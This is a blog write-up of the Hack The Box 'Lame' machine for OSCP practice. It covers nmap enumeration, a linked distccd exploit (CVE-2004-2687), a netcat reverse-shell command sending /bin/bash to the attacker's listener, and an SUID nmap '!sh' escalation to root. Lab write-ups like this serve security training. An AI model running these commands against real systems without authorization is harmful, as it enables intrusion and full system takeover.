Open in app

Sign in

Write

Sign in

Hack The Box — Lame — without Metasploit (TJNull’s list for OSCP)

Daniyal Ahmed
3 min readApr 21, 2023

--

Lame

This is my 5th write-up for Lame, a machine from TJNull’s list of HackTheBox machines for OSCP Practice. The full list can be found here.

In a general penetration test or a CTF, there are usually 3 major phases that are involved.

  1. Enumeration and Scanning (Information Gathering).
  2. Initial Foothold.
  3. Privilege Escalation.

Let’s get started with the box!

Enumeration

In order to hack into a system we need to first gather some information about it. For that, we use Nmap to scan the ports of the target machine to find out what services are running; services that we can target.

nmap -sC -sV -A -T4 -p- 10.129.195.133

  • -sC is used to run default scripts to enumerate the services further.
  • -sV is used for Version enumeration of the services
  • -A is used for aggressive (not usually recommended in real environment)
  • -T4 is used to set the number of parallel threads.
  • -p- is used to do a full port scan from 1–65535.
nmap

Initial foothold

Interestingly enough, distccd is running on port 3632. This was a new service for me. So, I went to research on this one instead of Samba 3.0.20 which has a famous exploit.

Looking up for distccd on Google, I found out

Distcc is a tool for speeding up compilation of source code by using distributed computing over a computer network. With the right configuration, distcc can dramatically reduce a project’s compilation time.

So, I went on to search for the exploit. And after doing a little search I came across this exploit for CVE-2004–2687 on Github.

https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855

After cloning this repo and executing the exploit, it showed me the usage syntax.

Usage

Let’s put all the arguments and re-run it.

command execution

And I was able to execute the commands.

I tried bash reverse_shell first. But it didn’t work. So, I check if netcat was installed on the target.

netcat

Netcat was installed. Getting a shell was so easy after wards, by simply starting a listener and giving “nc <IP><PORT>-e /bin/bash” as the command argument in exploit.

getting a shell

And we have a shell as daemon.

initial shell

Let’s collect the user flag.

user.txt

Privilege Escalation

First I looked for sudo executable programs and didn’t find anything. Then I looked for SUID files.

find / -perm -u=s -type f 2>/dev/null

SUID files

And I found out that I could run nmap as root.

So all I did was to start nmap in interactive mode and invoked shell from there.

nmap — interactive

nmap> !sh

root shell

And I got a root shell! Then collected the root flag.

root.txt

EZ! :)

Oscp
Tjnull
Hackthebox
Distcc
Penetration Testing

--

--

Daniyal Ahmed
Daniyal Ahmed

Written by Daniyal Ahmed

64 Followers
5 Following

Cyber Security Engineer

No responses yet

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams